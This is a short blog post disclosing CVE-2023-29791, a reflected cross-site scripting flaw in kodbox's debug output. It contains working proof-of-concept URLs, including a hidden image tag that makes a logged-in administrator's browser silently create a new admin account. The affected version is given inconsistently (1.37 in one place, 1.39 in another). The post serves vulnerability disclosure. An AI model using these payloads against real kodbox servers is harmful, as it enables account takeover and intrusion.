Headline
CVE-2023-29791: kodbox xss - JunBlog
kodbox <= 1.37 is vulnerable to Cross Site Scripting (XSS) via the debug information.
English version
0x01 Vulnerability Description
Reflective xss vulnerability caused by debug information
0x02 Affected version
kodbox<=V1.39
0x03 Vulnerability recurrence
Triggering conditions
- Turn off csrf protection
- Administrator privileges
Turn off csrf protection steps
Desktop->System settings->Basic->Security->Enable csrf protection (OFF)
Then construct the link to trigger xss
http://target.com/?API_ROUTE=admin%2Fshare%2Fget&type=<embed%20src%3d"data%3atext%2fhtml%3bbase64%2c%20PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4%3d">
Here construct a poc to add an administrator, because csrf is closed, here directly send a get request to add an administrator through the img tag, the added account is testu and the password is testuser
<img src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B%221%22%3A%221%22%7D%26sizeMax=0%26sizeUse=0" style='display:none'>
full link, visit
http://target.com/?API_ROUTE=admin/share/get&type=<img%20src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B"1"%3A"1"%7D%26sizeMax=0%26sizeUse=0"%20style=%27display:none%27>
Successfully created an admin user
- 本文作者:Juneha
- 本文链接:https://blog.mo60.cn/index.php/archives/kodbox-xss.html
- 版权声明:本博客所有文章除特别声明外,均默认采用 CC BY-NC-SA 4.0 许可协议。
- 文章声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
如果觉得我的文章对你有用,请随意赞赏,可备注留下ID方便感谢